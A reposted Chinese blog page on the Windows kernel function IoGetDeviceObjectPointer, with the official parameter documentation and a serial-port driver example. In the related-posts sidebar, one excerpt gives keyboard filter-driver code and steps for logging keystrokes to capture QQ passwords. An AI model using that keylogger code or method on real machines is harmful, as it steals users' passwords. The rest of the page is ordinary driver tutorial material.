IoGetDeviceObjectPointer

最新推荐文章于 2019-07-21 10:21:19 发布
最新推荐文章于 2019-07-21 10:21:19 发布
阅读量1.1k 收藏
点赞数

ZZ From:http://blog.csdn.net/zacklin/article/details/7466299

从名字获得设备对象

在知道一个设备名字的情况下,使用函数IoGetDeviceObjectPointer可以获得这个设备对象的指针。这个函数的原型如下:

<pre style="padding: 5px; margin-top: 0px; margin-bottom: 0px; overflow: auto; word-wrap: normal; font-size: 13.63636302947998px; line-height: 18.187271118164063px; font-family: Consolas, Courier, monospace !important;">NTSTATUS IoGetDeviceObjectPointer(
  _In_   PUNICODE_STRING ObjectName,
  _In_   ACCESS_MASK DesiredAccess,
  _Out_  PFILE_OBJECT *FileObject,
  _Out_  PDEVICE_OBJECT *DeviceObject
);


ParametersObjectName [in]Pointer to a buffer that contains a Unicode string that is the name of the device object.DesiredAccess [in]Specifies the ACCESS_MASK value that represents the desired access. Usually DesiredAccess is FILE_READ_DATA. Infrequently, the FILE_WRITE_DATA, or FILE_ALL_ACCESS access rights are specified.FileObject [out]Pointer to the file object that represents the corresponding device object to user-mode code if the call is successful.DeviceObject [out]Pointer to the device object that represents the named logical, virtual, or physical device if the call is successful.Return valueIoGetDeviceObjectPointer returns STATUS_SUCCESS if it is successful. Possible error return values include the following status codes:STATUS_OBJECT_TYPE_MISMATCHSTATUS_INVALID_PARAMETERSTATUS_PRIVILEGE_NOT_HELDSTATUS_INSUFFICIENT_RESOURCESSTATUS_OBJECT_NAME_INVALIDRemarksIoGetDeviceObjectPointer establishes a "connection" between the caller and the next-lower-level driver. A successful caller can use the returned device object pointer to initialize its own device objects. It can also be used as an argument to IoAttachDeviceToDeviceStack, IoCallDriver, and any routine that creates IRPs for lower drivers. The returned pointer is a required argument to IoCallDriver.This routine also returns a pointer to the corresponding file object. When unloading, a driver can dereference the file object as a means of indirectly dereferencing the device object. To do so, the driver calls ObDereferenceObject from its Unload routine, passing the file object pointer returned by IoGetDeviceObjectPointer. Failure to dereference the device object in a driver's Unload routine prevents the next-lower driver from being unloaded. However, drivers that close the file object before the unload process must take out an extra reference on the device object before dereferencing the file object. Otherwise, dereferencing the file object can lead to a premature deletion of the device object.To get a pointer to the highest-level driver in the file system driver stack, a driver must ensure that the file system is mounted; if it is not, this routine traverses the storage device stack. To ensure that the file system is mounted on the storage device, the driver must specify an appropriate access mask, such as FILE_READ_DATA or FILE_WRITE_ATTRIBUTES, in the DesiredAccess parameter. Specifying FILE_READ_ATTRIBUTES does not cause the file system to be mounted.After any higher-level driver has chained itself over another driver by successfully calling this routine, the higher-level driver must set the StackSize field in its device object to that of the next-lower-level driver's device object plus one.Callers of IoGetDeviceObjectPointer must be running at IRQL = PASSIVE_LEVEL. 
 

 
其中的ObjectName就是设备名字。DesiredAccess是期望访问的权限。实际使用时可以不要顾忌那么多,直接填写FILE_ALL_ACCESS即可。FileObject是一个返回参数,即获得这个设备对象的同时会得到的一个文件对象(File Object)。就打开串口设备这件事而言,这个文件对象并没有什么用处。但是必须注意:在使用这个函数之后必须把这个文件对象“解除引用”,否则会引起内存泄漏(请注意后面的代码)。 

 

 
要得到的设备对象就返回在参数DeviceObject中了。示例如下: 

 

<pre name="code" class="cpp">#include <ntddk.h>
// 因为用到了RtlStringCchPrintfW,所以必须使用头文件ntstrsafe.h
// 这里定义NTSTRSAFE_LIB是为了使用静态的ntstrsafe静态库。这样才能
// 兼容Windows2000。
#define NTSTRSAFE_LIB
#include <ntstrsafe.h>
……
// 打开一个端口设备
PDEVICE_OBJECT ccpOpenCom(ULONG id,NTSTATUS *status)
{
// 外面输入的是串口的id,这里会改写成字符串的形式
UNICODE_STRING name_str;
static WCHAR name[32] = { 0 };
PFILE_OBJECT fileobj = NULL;
PDEVICE_OBJECT devobj = NULL;
 // 根据id转换成串口的名字
memset(name,0,sizeof(WCHAR)*32);
RtlStringCchPrintfW(
name,32,
L"\\Device\\Serial%d",id);
RtlInitUnicodeString(&name_str,name);
 // 打开设备对象
*status = IoGetDeviceObjectPointer(
&name_str, 
FILE_ALL_ACCESS, 
&fileobj, &devobj);

// 如果打开成功了,记得一定要把文件对象解除引用
// 总之,这一句不要忽视
if (*status == STATUS_SUCCESS)
ObDereferenceObject(fileobj);
 // 返回设备对象
return devobj;
}

 

 

 


                

        

        

    




    

      

        

            

              
                
                  jtujtujtu
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
QQ密码记录程序

				
			

			

				

					05-15
				

			

		

		

			
				
http://blog.csdn.net/xiaoxiao108/article/details/7563159

最近看了看c++,写个程序玩玩。因为用户态代码不好截取到qq密码,写个键盘分层驱动。试了试效果还可以。


开发环境   vs2008 winddk ddkwizard       windowsxp      Dbgview

 实现方法
1.把过滤驱动挂载到键盘驱动上面
2.设置完成例程
3.通过KdPrint输出键盘扫描码到DebugView
4. 从DebugView的日志文件中读出键盘按键。


具体代码
1.把过滤驱动挂载到KeyBoardClass0上面
PFILE_OBJECT fileOjbect;
PDEVICE_OBJECT deviceObject;
UNICODE_STRING deviceName;
PDEVICE_EXTENSION pdx;
PDEVICE_OBJECT filterDeviceObject;
PDEVICE_OBJECT targetDevice;
fileOjbect=NULL;
RtlInitUnicodeString(&deviceName;,L"\\Device\\KeyBoardClass0");
status=IoGetDeviceObjectPointer(&deviceName;,FILE_ALL_ACCESS,&fileOjbect;,&deviceObject;);
pdoDeviceObj->Flags |= DO_BUFFERED_IO;
pdx=(PDEVICE_EXTENSION)pdoDeviceObj->DeviceExtension;
pdx->pDevice=pdoDeviceObj;
pdx->ustrDeviceName=usDeviceName;
filterDeviceObject=((PDEVICE_EXTENSION)DriverObject->DeviceObject->DeviceExtension)->pDevice;
targetDevice=IoAttachDeviceToDeviceStack(filterDeviceObject,deviceObject);
((PDEVICE_EXTENSION)DriverObject->DeviceObject->DeviceExtension)->TargetDevice=targetDevice;
filterDeviceObject->DeviceType=targetDevice->DeviceType; 
filterDeviceObject->Characteristics=targetDevice->Characteristics;
filterDeviceObject->Flags&=~DO_DEVICE_INITIALIZING;
filterDeviceObject->Flags|=(targetDevice->Flags&(DO_DIRECT_IO|DO_BUFFERED_IO));
ObDereferenceObject(fileOjbect);
return STATUS_SUCCESS;
2.设置完成例程
PDEVICE_EXTENSION pdx;
pdx=(PDEVICE_EXTENSION)DeviceObject->DeviceExtension;
IoCopyCurrentIrpStackLocationToNext(Irp);
IoSetCompletionRoutine(Irp,MyIoCompletion,NULL,TRUE,TRUE,TRUE);
NTSTATUS status=IoCallDriver(pdx->TargetDevice,Irp);
return  status;
3.输出键盘按键的扫描码
NTSTATUS MyIoCompletion(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp,IN PVOID Context)
{
if(NT_SUCCESS(Irp->IoStatus.Status))
{
PKEYBOARD_INPUT_DATA keys = (PKEYBOARD_INPUT_DATA)Irp->AssociatedIrp.SystemBuffer;
if(keys->Flags==0x0001||keys->Flags==0x0003)
KdPrint(("x",keys->MakeCode));
}
if(Irp->PendingReturned)
{
IoMarkIrpPending(Irp);
}
return STATUS_SUCCESS;
}

使用步骤
1.安装驱动
用DriverMonitor加载并运行Driver1.sys驱动文件

2.打开Dbgview,当按键时就可以看到dbgview中记录下的键盘扫描码

3.在dbgview中选择记录日志文件,处理下日志文件就可以得到qq密码了。


偶c语言菜鸟,欢迎大神们批评教育    不足的地方很多啊    多多交流     谢谢    邮箱328452421@qq.com   



http://blog.csdn.net/xiaoxiao108/article/details/7563159

			
		

	



                

              
                



	

		

			

				
					
Windows 驱动开发 新手入门(四)

				
			

			

				

					Doub1's Blog
				

				

					06-21
					
					2000
					
				

			

		

		

			
				
本篇文章介绍一下设备对象,这是写驱动过滤的基础,比如键盘,串口等等的过滤。是的缩写,直译就是物理设备对象,一般来说,就是在就是的设备对象。 只能返回设备对象地址。


 指向包含 Unicode 字符串的缓冲区的指针,该字符串是设备对象的名称。 指定表示所需访问的。 通常 ,DesiredAccess指定FILE_READ_DATA。 不经常指定FILE_WRITE_DATA或FILE_ALL_ACCESS访问权限。 指向表示相应设备对象到用户模式代码的文件对象的指针(如果调用成功)。 指向表示命名逻辑、虚

			
		

	



                


  
              

                


	

		

			

				
					
《Windows驱动开发技术详解》之驱动程序调用驱动程序——通过设备指针调用其他驱动程序...

				
			

			

				

					weixin_30700099的博客
				

				

					06-16
					
					212
					
				

			

		

		

			
				
本节介绍“手动”构造各个IRP,然后将IRP传递到相应驱动程序的派遣函数里。

获得设备指针

每个内核中的句柄都会和一个内核对象的指针联系起来。ZwCreateFile内核函数可以通过设备名打开设备句柄,这个设备句柄和一个文件对象的指针关联。IoGetDeviceObjectPointer内核函数可以通过设备名获得文件对象指针,而不是获得设备句柄。当调用IoGetDeviceO...

			
		

	





	

		

			

				
					
最简单的驱动helloWDM

				
			

			

				

					05-07
				

			

		

		

			
				
这是一个最简单的驱动程序,新手可以看一下。这是驱动的第一步!

			
		

	



		

			
		



	

		

			

				
					
U盘加密工具(安全必备)

				
			

			

				

					04-16
				

			

		

		

			
				
标题 "U盘加密工具(安全必备)" 指向的是一个专用于U盘数据安全保护的软件,这种工具能够确保存储在U盘中的敏感信息不被未经授权的人员访问。U盘加密工具通过创建一个安全的加密容器,将数据隐藏在加密的外壳下,...

			
		

	





	

		

			

				
					
windows驱动开发技术详解-part2

				
			

			

				

					07-06
				

			

		

		

			
				
这是书的光盘。共分为两个部分,这是第一部分。   本书由浅入深、循序渐进地介绍了Windows驱动程序的开发方法与调试技巧。本书共分23章,内容涵盖了  Windows操作系统的基本原理、NT驱动程序与WDM驱动程序的构造、...

			
		

	





	

		

			

				
					
Windows驱动开发技术详解的光盘-part1

				
			

			

				

					07-06
				

			

		

		

			
				
这是书的光盘。共分为两部分,这是第二部分。   本书由浅入深、循序渐进地介绍了Windows驱动程序的开发方法与调试技巧。本书共分23章,内容涵盖了Windows操作系统的基本原理、NT驱动程序与WDM驱动程序的构造、驱动...

			
		

	





	

		

			

				
					
关于IoGetDeviceObjectPointer函数

				
			

			

				

					danxuezx的专栏
				

				

					06-14
					
					2277
					
				

			

		

		

			
				
关于IoGetDeviceObjectPointer函数

			
		

	





	

		

			

				
					
驱动开发中关于RtlStringCchPrintfW无法解析的外部符号问题

				
			

			

				

					輚至消亡
				

				

					07-21
					
					505
					
				

			

		

		

			
				
今天在看串口的过滤的时候发现的问题,报错如下:



产生这个问题的原因是找不到导入库文件无法找到对应的符号表,由于驱动开发无法使用#pragma comment(lib,)的语法,所以解决方法是修改SOURCES文件:



之后在执行:



(完)


...

			
		

	





	

		

			

				
					
[转载]关于驱动中的ObReferenceObjectByName 和 IoGetDeviceObjectPointer

				
			

			

				

					wowbell的专栏
				

				

					03-17
					
					2130
					
				

			

		

		

			
				
今天huhu0013问我为什么ObReferenceObjectByName不能得到Device类型的对象,讨论一番,最终得到如下解释,记录一下:=================================================================================
原文:http://www.boxcounter.org/?action=show&id=13前些阵子学写过滤驱动,遇到个问题,在网上找到了相应的资料,Blog下来。  我写的程序需要挂在文件系统上,

			
		

	





	

		

			

				
					
RtlStringCchPrintfW 编译报错

				
			

			

				

					appearl的专栏
				

				

					05-18
					
					1860
					
				

			

		

		

			
				
<br />RtlStringCchPrintfW 编译的时候出现找不到连接符:<br />1>ntstrsafe.lib(woutput.obj) : error LNK2019: unresolved external symbol @__security_check_cookie@4 referenced in function __woutput_l<br />1>ntstrsafe.lib(output.obj) : error LNK2001: unresolved external symbo

			
		

	





	

		

			

				
					
Window XP驱动开发(二十二) 驱动程序的同步处理

				
			

			

				

					chenyujing1234的专栏
				

				

					08-04
					
					7663
					
				

			

		

		

			
				
转载请标明是引用于 http://blog.csdn.net/chenyujing1234 
欢迎大家拍砖!
 
 参考书籍:>
1、中断请求级
在Windows的时候,设计者将中断请求分别划分为软件中断和硬件中断,并将这些中断都映射成不同级别的中断请求级(IRQL)。
同步处理机制很大程序上依赖于中断请求级,本节对中断请求级做介绍。
1、1 中断请求(IRQ)与可编程中断控制器(P

			
		

	





	

		

			

				
					
I/O Request Packet

				
			

			

				

					zhuo_zhibin的专栏
				

				

					09-14
					
					5865
					
				

			

		

		

			
				
第5章 I/O Request Packet

5.1 数据结构
在处理 I/O 请求上,有两个重要的数据结构:IRP(I/O request packet)和 IO_STACK_LOCATION

5.1.1 IRP 的结构
下面是在 windbg 里得到的 IRP 结构:

nt!_IRP
   +0x000 Type             : Int2B
   +0x002 Size

			
		

	





	

		

			

				
					
11.driverbase-IoGetDeviceObjectPointer源码(need ObDereferenceObject)

				
			

			

				

					hgy413的专栏
				

				

					12-25
					
					1480
					
				

			

		

		

			
				
DDK Build编译的时候,使用3个文件来描述被编译的源码,其中SOURCES和Makefile是必须的,而DIRS则只在划分目录的时候有用。Makefile在这里作用并不大但是必须和SOURCES文件成对出现,关键还是SOURCES和DIRS文件。


SOURCES文件用于描述其所在目录下,有哪些文件参与编译,编译的结果应该是什么(是一个lib还是一个sys?),输出目录在哪里,要传递

			
		

	





	

		

			

				
					
通过设备指针调用其他驱动程序(同步方式)

				
			

			

				

					125096
				

				

					08-07
					
					1009
					
				

			

		

		

			
				
EXE部分
#include 
#include 
#include 
#include "Ioctl.h"



int main (void)
{
	char linkname[]="\\\\.\\HelloDDKB";
	HANDLE hDevice = CreateFileA(linkname,
		GENERIC_READ | GENERIC_WRITE,
		0,
		NULL,

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值